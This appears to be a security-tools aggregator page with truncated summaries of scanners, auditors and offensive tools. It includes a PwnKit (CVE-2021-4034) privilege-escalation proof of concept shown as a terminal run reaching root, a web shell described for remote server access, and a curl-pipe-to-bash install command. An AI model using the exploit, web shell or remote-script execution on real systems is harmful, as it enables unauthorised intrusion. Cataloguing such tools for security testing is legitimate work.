WSVuls : Website Vulnerability Scanner Detect Issues
WSVuls is a simple and powerful command line tool for Linux, Windows and macOS. It is designed for developers/testers and for IT workers who want to test for vulnerabilities and analyse a website from a single command. It detects issues such as outdated software versions, insecure HTTP headers, and long and useless requests. Why WSVuls? WSVuls can extract the following data while crawling: Cloudflare...
Scanmycode-Ce : Code Scanning/SAST/Static Analysis/Linting Using Many tools/Scanners
Scanmycode-Ce is a Code Scanning/SAST/Static Analysis/Linting solution using many tools/scanners with one report. You can also add any tool to it. Currently, it supports many languages and tech stacks. Similar to SonarQube, but it is different. TLDR: To install it, install docker and docker-compose and then pick one of 2 options.
Fastest (use DockerHub built images). If unsure, use this:
    git clone https://github.com/marcinguy/scanmycode-ce.git
    cd scanmycode-ce/dockerhub
    ./start.sh
Slower (build everything):
    git clone https://github.com/marcinguy/scanmycode-ce.git
    cd scanmycode-ce/docker
    ./start.sh
Go in the...
Master_Librarian : A Tool To Audit Unix/*BSD/Linux System Libraries To Find Public Security Vulnerabilities
Master_Librarian is a simple tool to audit Unix/*BSD/Linux system libraries to find public security vulnerabilities.
To install requirements:
    $ sudo python3 -m pip install -r requirements.txt
Overview:
    $ python3 master_librarian.py -h
    Master librarian v0.3
    Tool to search public vulnerabilities on local libraries
    by CoolerVoid
    Example:
    $ python3 master_librarian.py -t csv
    $ python3 master_librarian.py -t txt -l 3
    usage: master_librarian.py -t TYPES
    optional arguments:
    -h, --help show this help message and...
GONET-Scanner : Golang Network Scanner With Arp Discovery And Own Parser
GONET-Scanner tool has its own ARP scanner and parser facility.
Install:
    chmod +x install.sh
    ./install.sh
Usage:
    -ar CIDR: ARP Discovery
    -ar CIDR -s: Scan ports in all hosts discovered
    -ap: Scan to 65535 Ports
    -pr MINPORT MAXPORT: Define Port Range to Scan
    -1000: Scan Top 1000 ports (like nmap)
    -t: Set Timeout (in milliseconds)
    go run scannerport.go -ap : Allports TCP Scan
    go run scannerport.go Default Scan 0-1024 ports
    go run...
Geowifi : Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases
Geowifi is a tool to search WiFi geolocation data by BSSID and SSID on different public databases. Databases: Wigle, Apple, OpenWifi, Milnikov. Prerequisites: Python3. In order to display emojis on Windows, it is recommended to install the new Windows terminal. In order to use the Wigle service it is necessary to obtain an API and configure the utils/API.yaml file, replacing the value of the "wigle_auth" parameter with the "Encoded for use" data provided by Wigle. This...
GraphQL Cop : Security Auditor Utility For GraphQL APIs
GraphQL Cop is a small Python utility to run common security tests against GraphQL APIs. GraphQL Cop is perfect for running CI/CD checks in GraphQL. It is lightweight, and covers interesting security issues in GraphQL. GraphQL Cop allows you to reproduce the findings by providing cURL commands upon any identified vulnerabilities. Requirements: Python3, Requests Library. Detections: Alias Overloading (DoS), Batch Queries (DoS), GET based Queries (CSRF), GraphQL Tracing...
Fastfuz-Chrome-Ext : Site Fast Fuzzing With Chrome Extension
Fastfuz-Chrome-Ext is a Chrome extension for fast fuzzing of websites. Install. Add Your Custom Files: Open files.txt. Paste your file or directory names in, line by line. Happy Hunting.
Osmedeus : A Workflow Engine For Offensive Security
Osmedeus is a Workflow Engine for Offensive Security.
Installation
NOTE that you need some essential tools like curl, wget, git, zip and login as root to start
    bash -c "$(curl -fsSL https://raw.githubusercontent.com/osmedeus/osmedeus-base/master/install.sh)"
Build the engine from source
Make sure you installed golang >= v1.17
    mkdir -p $GOPATH/src/github.com/j3ssie
    git clone --depth=1 https://github.com/j3ssie/osmedeus $GOPATH/src/github.com/j3ssie/osmedeus
    cd $GOPATH/src/github.com/j3ssie/osmedeus
    make build
Usage
Scan Usage:
    osmedeus scan -f -t
    osmedeus scan -m -T
    osmedeus scan -f /path/to/flow.yaml -t
    osmedeus scan...
PwnKit-Exploit : Proof Of Concept (PoC) CVE-2021-4034
PwnKit-Exploit is a proof of concept for a local privilege escalation vulnerability found in polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according to predefined policies.
Proof of Concept
    debian@debian:~/PwnKit-Exploit$ make
    cc -Wall exploit.c -o exploit
    debian@debian:~/PwnKit-Exploit$ whoami
    debian
    debian@debian:~/PwnKit-Exploit$ ./exploit
    Current User before execute exploit
    hacker@victim$whoami: debian
    Exploit written by @luijait (0x6c75696a616974)
    Enjoy your root if exploit was completed succesfully
    root@debian:/home/debian/PwnKit-Exploit# whoami
    root
    root@debian:/home/debian/PwnKit-Exploit#
Fix
Command | Use
sudo chmod 0755...
PyShell : Multiplatform Python WebShell
PyShell is a multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells, the main goal of the tool is to use as little code as possible on the server side, regardless of the language used or the operating system of the server. Thanks to this, you can use...